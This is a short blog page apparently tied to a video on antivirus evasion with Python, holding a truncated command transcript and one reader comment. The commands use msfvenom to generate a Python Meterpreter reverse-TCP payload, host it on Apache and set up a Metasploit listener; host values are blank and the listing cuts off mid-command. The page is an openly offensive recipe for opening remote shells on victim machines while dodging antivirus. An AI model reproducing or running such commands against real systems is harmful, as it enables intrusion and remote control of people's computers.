Antivirus Evasion with Python

The full article related to this video is available at:

Commands transcript:

Kali Linux (IP:
msfvenom -p python/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw -o /var/www/html/
service apache2 start
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LPORT…

, , ,

1 thought on “Antivirus Evasion with Python

  1. Hello,It is mandatory to go through the Shell before you refer to the victim, or I can simply direct you from Kali linux Directly to the "Victim"

    I await your response, very good video!

Leave a Reply

Your email address will not be published. Required fields are marked *